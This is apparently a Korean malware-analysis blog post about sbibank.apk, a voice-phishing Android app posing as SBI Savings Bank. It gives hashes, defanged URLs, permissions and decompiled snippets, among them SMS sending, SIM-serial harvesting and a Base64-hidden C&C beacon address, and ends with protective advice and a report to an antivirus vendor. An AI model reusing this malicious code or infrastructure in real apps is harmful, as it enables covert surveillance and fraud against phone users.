꿈을꾸는 파랑새

오늘은 SBI 저축은행으로 속이는 보이스피싱 앱인 sbibank.apk(2021.3.28)에 대해 분석을 하는 시간을 가져 보겠습니다.
감염이 되는 경로는 다음과 같습니다.
hxxp://154.23.55(.)21/sbi/ -> hxxp://154.23.55(.)21/sbi/sbibank(.)apk 입니다.
해쉬값은 다음과 같습니다.
파일명: sbibank.apk
사이즈:9,161,476 Bytes
작성일시: 2021-03-25 22:07:31 (+09:00)
수정일시: 2021-03-25 22:06:57 (+09:00)
접근일시: 2021-03-25 22:07:31 (+09:00)
CRC32: 49c19d9a

SBI 저축은행 보이스피싱 사이트

MD5:5cc6733864fc69a545be3aa44316a122
SHA-1:09e06bca19b8a7f266502cc53366ae6d0e6f5475
SHA-256:546f93d93d47c422b3193864c872a64f87fabd1dab845eecbf68195c41d35207
악성코드 이름과 패키지 이름은 다음과 같습니다.
app_name: 바빌론
package_name:net.threetensix3.tek.views20210323
입니다. 그리고 악성코드 권한은 다음과 같이 총 21개로 이루어져 있습니다.

SBI 저축은행 사칭 보이스피싱 앱 악성코드 권한

android.permission.CALL_PHONE
android.permission.READ_PHONE_STATE
android.permission.SYSTEM_ALERT_WINDOW
android.permission.WAKE_LOCK
android.permission.DISABLE_KEYGUARD
android.permission.READ_PHONE_NUMBERS
android.permission.READ_CALL_LOG
android.permission.READ_CONTACTS
android.permission.WRITE_CONTACTS
android.permission.RECORD_AUDIO
android.permission.MODIFY_AUDIO_SETTINGS
android.permission.ACCESS_FINE_LOCATION
android.permission.RECEIVE_USER_PRESENT
android.permission.INTERNET

net.threetensix3.tek.tools.k 스마트폰 문자 관련 권한

android.permission.PROCESS_OUTGOING_CALLS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.WRITE_CALL_LOG
android.permission.ANSWER_PHONE_CALLS
android.permission.READ_SMS
android.permission.CAMERA
android.hardware.camera
android.hardware.camera.autofocus
android.permission.FOREGROUND_SERVICE
android.permission.GET_TASKS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.REORDER_TASKS
android.hardware.telephony
android.permission.SYSTEM_ALERT_WINDOW
android.permission.READ_EXTERNAL_STORAGE
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.ACCESS_NETWORK_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
android.permission.FLASHLIGHT
일단 악성코드 권한을 보면 음성녹음, 연락처 접근해서 읽고 쓰기, 카메라 작동, 전화번호 읽고 쓰기, 외장 디스크 접근 및 읽고 쓰고 와이파이 접근 등이 보이는 것을 볼 수가 있으면 해당 악성코드가 설치되면 그냥 스마트폰 권한을 한방에 다 넘어가는 구조로 되어 있고 그리고 당연히 경찰, 은행 등으로 지원을 받고 싶어서 전화번호를 입력해서 전화를 걸어도 당연히 스마트폰 권한은 이미 넘어갔기 때문에 전화금융사기 일당으로 전화가 연결되는 것이 당연합니다.

Bytecode-Viewer 로 악성코드 주소

그리고 net.threetensix3. tek.tools.k 부분에서는 다음과 같이 스마트폰에 있는 문자에 접근하는 코드가 있는 것을 볼 수가 있습니다.

public static boolean b(String paramString1, String paramString2) {
    try {
      SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
      return true;
    } catch (Exception exception) {
      exception.printStackTrace();
      return false;
    } 
  }
}
com.umeng.commonsdk.internal.utils.k 에서는 iccid,imemi 정보를 획득하기 위한 코드들도 보이는 것을 확인할 수가 있습니다.
 public static String b(Context paramContext) {
    String str2 = null;
    String str1 = str2;
    if (paramContext != null) {
      str1 = str2;
      if (UMUtils.checkPermission(paramContext, "android.permission.READ_PHONE_STATE")) {
        TelephonyManager telephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
        if (telephonyManager == null)
          return null; 
        str1 = telephonyManager.getSimSerialNumber();
      } 
    } 
    return str1;
  }

그리고 간단하게 Bytecode-Viewer를 통해서 url(인터넷 주소)를 확인을 해 보면 다음과 같이 들어가 져 있습니다.
뭐 중국어가 들어가 져 있는 것도 볼 수가 있습니다.
예를 들어서 다음과 같습니다.
发送数据时发生:데이터를 보낼 때 발생
异常,导致友盟后端域名解析失败。请检查系统DNS服务器配置是否正确。详见链接: 예외로 말미암아 Umeng 백엔드 도메인 이름 확인이 실패했습니다. 시스템 DNS 서버 구성이 올바른지 확인하십시오. 자세한 내용은 링크를 참조하십시오.
统计SDK常见问题索引贴 详见链接:Statistics SDK FAQ Index Post 자세한 내용은 링크 참조
등과 중국어가 들어가 져 있는것을 볼 수가 있으면 앞서 피싱 사이트 국기를 보면 홍콩인 것을 확인할 수가 있습니다. 대충 중국에서 만들어진 것이 아닐까. 라는 추측할 수가 있는 부분입니다.

net.threetensix3.tek.tools.NetStateChangeReceiver 악성코드 트래픽 암호화

그리고 해당 악성코드에 포함된 URL은 다음과 같습니다.
hxxp://a6190c13118f4cf2846e787fc492c0a6@103(.)93.79.32:9000/8
hxxps://developer(.)umeng.com/docs/66632/detail
hxxps://cmnsguider(.)yunos.com:443/genDeviceToken
hXXps://ulogs(.)umeng.com/unify_logs
hxxps://mozilla(.)org/MPL/2.0/
hxxs://alogsus(.)umeng.com/unify_logs
hxxps://ouplog(.)umeng.com",
hxxp://schemas(.)android.com/apk/res-auto
hxxps://alogus(.)umeng.com/unify_logs
hxxp://schemas(.)android.com/apk/res/android
4RR(.)WRS/Wn
vnd(.)android.cursor.item/phone_v2
hxxps://plbslog(.)umeng.com
hxxps://ulogs(.)umengcloud.com/unify_logs
vnd(.)android.cursor.item/name
hxxp://ns(.)adobe.com/xap/1.0
hxxps://publicsuffix(.)org/list/public_suffix_list.dat
입니다.

net.threetensix3.tek.tools.NetStateChangeReceiver


net.threetensix3.tek.tools.NetStateChangeReceiver 부분에서 악성코드 트래픽을 암호화해서 보내는 것을 볼 수가 있습니다.

public void onReceive(Context paramContext, Intent paramIntent) {
    if (paramIntent != null && paramIntent.getAction() != null && "android.net.conn.CONNECTIVITY_CHANGE".equals(paramIntent.getAction())) {
      n n1 = o.b(paramContext);
      b(n1);
      SharedPreferences sharedPreferences = paramContext.getSharedPreferences("networkType", 0);
      if (!n1.equals("") && !sharedPreferences.getString("networkType", "").equals(n1)) {
        StringBuilder stringBuilder = new StringBuilder();
        stringBuilder.append(new String(Base64.decode("aHR0cDovLzEwMy4xNTkuODAuODU=", 2)));
        stringBuilder.append(":");
        stringBuilder.append("8779");
        stringBuilder.append("/api/signal/");
        stringBuilder.append(d.b.a.a.a.a);
        stringBuilder.append("/");
        stringBuilder.append(n1.toString());
        stringBuilder.append("/");
        a(stringBuilder.toString());
        SharedPreferences.Editor editor = sharedPreferences.edit();
        editor.putString("networkType", n1.toString());
        editor.commit();
      } 
    } 

여기서 aHR0cDovLzEwMy4xNTkuODAuODU 이라는 것이 보일 것인데 이것이 연결되면 hxxp://103(.)159.80.95 즉 C&C server(C&C 서버)로 연결이 되는 것을 확인할 수가 있습니다. 일단 이런 악성코드에 감염되기 싫은 분들은 일단 기본적으로 주소를 잘 보면 숫자로 돼 있으면 100% 피싱 사이트 라고 생각을 하시면 될 것이면 이런 것을 예방하기 위해서 공식 스토어 이외에 앱을 설치를 하지 말고 스마트폰에서 외부에서 앱을 설치를 하려고 하면 분명히 경고합니다. 

그 경고 무시 하시 하는 행동을 하시면 안 됩니다. 그리고 공식력 있는 V3,Eset 같은 백신앱을 설치를 해서 안전하게 스마트폰을 사용하시길 바랍니다. 일단 2021.03.25 23:03 KST 기준을 탐지가 안 되는 V3에 AhnRpt 통해서 해당 악성코드를 신고해 두었습니다. 일단 조만간에 업데이트가 되어서 탐지가 될 것이며 그리고 항상 공식 스토어를 이용을 하고 다른 곳 즉 외부에서는 앱을 다운로드 및 설치를 하는 것을 하지 말아야 합니다.

그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band